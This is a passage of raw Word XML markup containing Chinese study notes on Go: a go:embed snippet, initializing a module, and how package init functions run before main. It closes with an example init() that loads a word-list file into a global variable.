    </w:p>
    <w:p w14:paraId="7924C6BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E91602" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>_ "embed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FDFA02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346CE9CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51525DD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>//go:embed hello.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE64742" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var b []byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2048A67D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E27D863" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A512AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA3FFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D4975E" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABFCFDB" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="_Toc159779815"/>
      <w:r w:rsidRPr="003E7BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>初始化项目</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p w14:paraId="0B95F52E" w14:textId="77777777" w:rsidR="00CF6CEA" w:rsidRPr="003E7BB3" w:rsidRDefault="00CF6CEA" w:rsidP="00CF6CEA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E7BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7BB3">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>o mod init github.com/senranja/xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06053E74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12399972" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="316" w:name="_Toc159779773"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>包中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数：先于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数执行，实现包的一些初始化操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
    </w:p>
    <w:p w14:paraId="46C071D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FDB6319" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://zhuanlan.zhihu.com/p/34211611</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E759FCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018086FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大家都知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数是程序的入口函数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数返回后，程序也就结束了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有另外一个特殊的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，先于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数执行，实现包级别的一些初始化操作，今天我们就深入介绍下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC77A24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A595F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>函数的主要作用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1875FBD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014B5747" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化不能采用初始化表达式初始化的变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425FEF0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序运行前的注册。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562784C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sync.Once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DADF837" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76183284" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1956D84F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>函数的主要特点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B506F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D941BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数先于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数自动执行，不能被其他函数调用；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BBF436" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数没有输入参数、返回值；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C947B74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>每个包可以有多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>函数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6751080D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包的每个源文件也可以有多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，这点比较特殊；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAEBEC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同一个包的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行顺序，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有明确定义，编程时要注意程序不要依赖这个执行顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD8B866" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>不同包的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>函数按照包导入的依赖关系决定执行顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7126E310" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE1DDFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>程序初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E1272" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE669AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序初始化先于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数执行，由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行初始化，初始化顺序如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B709F2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化导入的包（包的初始化顺序并不是按导入顺序（“从上到下”）执行的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要解析包依赖关系，没有依赖的包最先初始化，与变量初始化依赖关系类似，参见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量的初始化）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A97B4CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化包作用域的变量（该作用域的变量的初始化也并非按照“从上到下、从左到右”的顺序，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析变量依赖关系，没有依赖的变量最先初始化，参见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量的初始化）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FFF76F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行包的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC44ACB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B76360B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化顺序：变量初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; init() -&gt; main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01043E35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD3349F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实例：初始化包中某全局变量，供多线使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33968889" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var wordListText string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100CDC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E2C02C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F2F94A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>var wordFilePath = "E:/BiLing/20220905-gitleaks-Docker/SecretDetection/bindata/american-english"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B526EE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>wordListTextBytes, err := ioutil.ReadFile(wordFilePath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04755C01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25573BCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单词本文件读取失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DEC1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77B056" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>wordListText = string(wordListTextBytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B495A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDD18C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
